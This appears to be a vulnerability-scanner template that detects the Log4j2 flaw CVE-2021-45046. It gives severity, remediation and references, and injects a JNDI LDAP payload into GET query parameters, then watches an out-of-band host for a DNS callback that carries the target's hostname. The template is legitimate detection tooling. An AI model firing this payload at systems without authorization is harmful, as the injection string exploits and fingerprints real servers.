id: CVE-2021-45046-DAST

info:
  name: Apache Log4j2 - Remote Code Injection
  author: princechaddha
  severity: critical
  description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
  impact: |
    Attackers can achieve remote code execution in non-default Log4j2 configurations through Thread Context Lookup Pattern manipulation, potentially compromising application servers.
  remediation: |
    Upgrade Apache Log4j2 to version 2.17.0 or later that completely removes support for Message Lookups and disables JNDI by default.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
    - https://twitter.com/marcioalm/status/1471740771581652995
    - https://logging.apache.org/log4j/2.x/
    - http://www.openwall.com/lists/oss-security/2021/12/14/4
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9
    cve-id: CVE-2021-45046
    cwe-id: CWE-502
    epss-score: 0.9434
    epss-percentile: 0.99957
  metadata:
    max-request: 1
    confidence: tenative
  tags: cve,cve2021,rce,oast,log4j,injection,dast,kev,vkev,vuln

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      log4j:
        - "${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}"

    fuzzing:
      - part: query
        fuzz:
          - "{{log4j}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

    extractors:
      - type: regex
        part: interactsh_request
        group: 2
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output

      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
# digest: 4a0a00473045022019b84248d4ae2b6a3715d062b997beb06d3b833acb93408f1ddd1ec35df92b10022100d91bd136fba8f63783d3fac501f172a2333f50bda6ea2138793164f70c4480ad:922c64590222798bb761d5b6d8e72950